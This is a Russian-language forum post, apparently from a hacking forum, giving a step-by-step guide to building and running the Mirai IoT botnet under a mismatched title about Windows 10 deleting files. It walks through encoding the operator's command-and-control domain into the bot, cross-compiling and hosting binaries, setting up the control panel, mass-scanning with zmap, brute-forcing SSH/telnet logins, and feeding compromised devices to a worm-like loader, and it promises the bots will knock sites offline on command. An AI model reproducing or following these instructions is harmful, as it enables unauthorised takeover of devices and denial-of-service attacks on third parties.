Виндовс 10 удалил все файлы. Проверяем запрет на удаление

Нам понадобится два VPS KVM сервера и домен. Виртуализация именно KVM, OpenVZ мимо в этот раз.

Сервера я беру здесь -

На одном сервере будем ставить сам ботнет, на втором будем сканировать ботов. (брутить)

ВАЖНО. Сервера должны быть на базе Debian 8, и иметь как минимум 1GB RAM.

Домен любой, без разницы.

Извините конечно, но рассказывать как прикрутить домен к VPS я не буду. Это не сложно, сами разберетесь.

PuTTY и начинаем.

# apt-get update -y

# apt-get upgrade -y

# apt-get install unzip gcc golang electric-fence screen sudo git -y

# apt-get install mysql-server -y

# apt-get install mysql-client -y

# apt-get install apache2 -y

При установке MySQL, нужно будет создать пароль для доступа к MySQL для root пользователя. Пароль нормальный придумаете, без всяких " qwerty "

Запишите куда нибудь, он нам еще будет нужен.

# sudo apt-get install curl git mercurial make binutils bison gcc build-essential -y

# bash < <(curl -s -S -L

Вы должны быть зарегистрированы, чтобы видеть ссылки.

# gvm install go1.4

# gvm use go1.4 [--default]

# gvm install go1.4 -B

# gvm use go1.4

# export GOROOT_BOOTSTRAP=$GOROOT

# gvm install go1.5

# gvm use go1.5

# gvm install go1.8

# gvm use go1.8

После установки всех утилит, качаем исходники бота -

Вы должны быть зарегистрированы, чтобы видеть ссылки.

И загружаем на сервер. Командой wget , или просто через программу WinSCP .

# unzip Mirai-Source-Code-master.zip

# cd Mirai-Source-Code-Master/mirai/tools

# gcc enc.c -o enc

# ./enc string ******* (свой домен пишем, который прикрутили к серверу) и жмем Enter.

Тут вы увидите такой текст -

XOR"ing 14 bytes of data...

\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22

14 - тут будет другая цифра у вас, так что не волнуйтесь, всё правильно.

Копируем весь этот текст.

Открываем через nano редактор, или же через WinSCP файл table.c который находится в папке mirai/bot

Должны увидеть это -

Вы должны быть зарегистрированы, чтобы видеть ссылки.

Строка add_entry(TABLE_CNC_DOMAIN - всё что в кавычках меняем на свой текст, который только что скопировали. Вместо " 30 " пишем свою цифру, которую тоже только что скопировали. Тоже самое делаем с строкой add_entry(TABLE_SCAN_CB_DOMAIN

Сохраняем, и закрываем редактор.

Открываем редактором файл mirai/cnc/main.go

Видим это -

Вы должны быть зарегистрированы, чтобы видеть ссылки.

"127.0.0.1" меняем на "127.0.0.1:3306"

"password" меняем на наш MySQL пароль который вводили ранее. "

Сохраняем файл, и закрываем редактор.

Просто копируйте всю эту хуйню, рассказывать зачем это нужно, не буду -

# mkdir /etc/xcompile

# cd /etc/xcompile

# wget

Вы должны быть зарегистрированы, чтобы видеть ссылки.

# wget

Вы должны быть зарегистрированы, чтобы видеть ссылки.

# wget

Вы должны быть зарегистрированы, чтобы видеть ссылки.

# wget

Вы должны быть зарегистрированы, чтобы видеть ссылки.

# wget

Вы должны быть зарегистрированы, чтобы видеть ссылки.

# wget

Вы должны быть зарегистрированы, чтобы видеть ссылки.

# wget

Вы должны быть зарегистрированы, чтобы видеть ссылки.

# wget

Вы должны быть зарегистрированы, чтобы видеть ссылки.

# wget

Вы должны быть зарегистрированы, чтобы видеть ссылки.

# tar -jxf cross-compiler-armv4l.tar.bz2

# tar -jxf cross-compiler-i586.tar.bz2

# tar -jxf cross-compiler-m68k.tar.bz2

# tar -jxf cross-compiler-mips.tar.bz2

# tar -jxf cross-compiler-mipsel.tar.bz2

# tar -jxf cross-compiler-powerpc.tar.bz2

# tar -jxf cross-compiler-sh4.tar.bz2

# tar -jxf cross-compiler-sparc.tar.bz2

# tar -jxf cross-compiler-armv6l.tar.bz2

# rm *.tar.bz2

# mv cross-compiler-armv4l armv4l

# mv cross-compiler-i586 i586

# mv cross-compiler-m68k m68k

# mv cross-compiler-mips mips

# mv cross-compiler-mipsel mipsel

# mv cross-compiler-powerpc powerpc

# mv cross-compiler-sh4 sh4

# mv cross-compiler-sparc sparc

# mv cross-compiler-armv6l armv6l

# export PATH=$PATH:/etc/xcompile/armv4l/bin

# export PATH=$PATH:/etc/xcompile/i586/bin

# export PATH=$PATH:/etc/xcompile/m68k/bin

# export PATH=$PATH:/etc/xcompile/mips/bin

# export PATH=$PATH:/etc/xcompile/mipsel/bin

# export PATH=$PATH:/etc/xcompile/powerpc/bin

# export PATH=$PATH:/etc/xcompile/powerpc-440fp/bin

# export PATH=$PATH:/etc/xcompile/sh4/bin

# export PATH=$PATH:/etc/xcompile/sparc/bin

# export PATH=$PATH:/etc/xcompile/armv6l/bin

# export PATH=$PATH:/usr/local/go/bin

# export GOPATH=$HOME/Documents/go

# go get github.com/go-sql-driver/mysql

# go get github.com/mattn/go-shellwords

# cd Mirai-Source-Code-master/mirai

# ./build.sh debug telnet

# ./build.sh release telnet

# mv mirai* /var/www/html

# cd /var/www/html

# mkdir bins

# mv * bins/

Теперь MySQL.

# mysql -u root -p

Тут попросят пароль. Вводим пароль который ранее установили.

# create database mirai;

# use mirai

Теперь копируем весь текст от сюда -

Вы должны быть зарегистрированы, чтобы видеть ссылки.

Вставляем, и жмем Enter.

Копируем текст от сюда -

Вы должны быть зарегистрированы, чтобы видеть ссылки.

Вместо anna-senpai пишем свой логин. Любой. Так же и с myawesomepassword. Эти данные нам нужны будут для доступа в панель управления ботом.

Должно быть вот так - INSERT INTO users VALUES (NULL, "pizdec", "zaebalsjapisatj", 0, 0, 0, 0, -1, 1, 30, "");

Копируем, вставляем, жмем Enter.

Теперь можно выходить.

Уже почти всё.

# cd Mirai-Source-Code-master/mirai/release

# touch prompt.txt

# screen ./cnc

Должны увидеть надпись MySQL DB opened

Не закрываем эту сессию, открываем новую.

Вы должны быть зарегистрированы, чтобы видеть ссылки.

Вместо ******* пишем свой домен, и жмем Open.

Вводим логин и пароль, в моем случае это -

zaebalsjapisatj

Всё, мы в панели управления ботом.

Теперь нам нужны боты. Тут всё просто, инсталлы никакие не нужны.

Настроим loader.

Loader нужен для того чтобы ботов можно было бы добавлять с текстовых файлов. Допустим набрутили мы loT устройств (роутеры, камеры, телефоны) и чтобы их добавить в бот, нужен loader.

Так же loader это " червь "

Подключаемся к нашему серверу через PuTTY и WinSCP.

С помощью WinSCP находим файл main.c в папке Mirai-Source-Code-master/dlr

Пишем IP нашего сервера как на скрине -

Вы должны быть зарегистрированы, чтобы видеть ссылки.

Запятые оставляем, так и должно быть. Сохраняем и закрываем.

Теперь с PyTTY заходим на наш сервак и пишем -

# cd Mirai-Source-Code-master/dlr

# chmod 777 *

# ./build.sh

# cd release

# mv dlr* ~/Mirai-Source-Code-master/loader/bins

Теперь открывем WinSCP и находим файл main.c в папке Mirai-Source-Code-master/loader/src

Меняем на свой IP как на скрине -

Вы должны быть зарегистрированы, чтобы видеть ссылки.

Сохраняем и закрываем.

Через PuTTY -

# ./build.sh

С помощью WinSCP открываем файл scanListen.go который можно найти в папке Mirai-Source-Code-master/mirai/tools

Меняем на свой IP сервера -

Вы должны быть зарегистрированы, чтобы видеть ссылки.

Потом с PyTTY -

# cd Mirai-Source-Code-master/mirai/tools

# go build scanListen.go

Теперь у нас появился новый файл - scanListen (без .go , просто scanListen )

scanListen нужно переместить в папку Mirai-Source-Code-master/loader

Просто с помощью WinSCP кидаем его в папку loader

Теперь проверим работает ли всё

# ./loader

Если видите то что на скрине, значит всё правильно -

Вы должны быть зарегистрированы, чтобы видеть ссылки.

Если возникают ошибки, пишите в тему, помогу.

Чтобы загрузить ботов с списка, кидаем текстовик в папку loader и набираем команду -

# cat list.txt | ./loader

Всё, все боты которых вы набрутили будут у вас, будут ложить сайты по вашей команде.

Я лично этот способ не использовал, нашел легче способ.

Тут нам нужен второй сервер. Так же на Debian 8.

# apt-get update -y

# apt-get upgrade -y

# apt-get install python-paramiko -y

# apt-get install zmap -y

zmap нам нужен для сканирования портов. Принцип работы как у KPortScan , только в 50 раз быстрей.

Копируем весь код от сюда -

Вы должны быть зарегистрированы, чтобы видеть ссылки.

И сохраняем как scan.py

Тут вы можете добавить свои пароли, и логины -

Вы должны быть зарегистрированы, чтобы видеть ссылки.

Строку combo не трогаем!

Тут нужно прописать IP сервера на котором стоит бот -

Вы должны быть зарегистрированы, чтобы видеть ссылки.

Меняем всё, и сохраняем.

Файл scan.py кидаем в любое место на нашем сервере. На втором сервере, который чисто для сканирования, тот на котором бот не трогаем.

Нам нужны IP которые мы будем сканировать.

#zmap -p22 -o list.txt -B 100M (можно и другие порты сканировать, я сканировал 22 или 23 всегда)

Все результаты будут в файле list.txt

После того как собрали IP (чем больше тем лучше) файл list.txt кидаем рядом к файлу scan.py и пишем -

# python scan.py list.txt 500

Всё, сидим и смотрим как растет наш ботнет.

Когда наберется хотя бы 200 ботов, можно запустить loader.

Для этого заходим на сервер где установлен ботнет и -

# cd Mirai-Source-Code-master/loader

# ulimit -n 9999999

# ./scanListen | ./loader

Теперь бот будет работать по принципу " червя " и добивать еще ботов.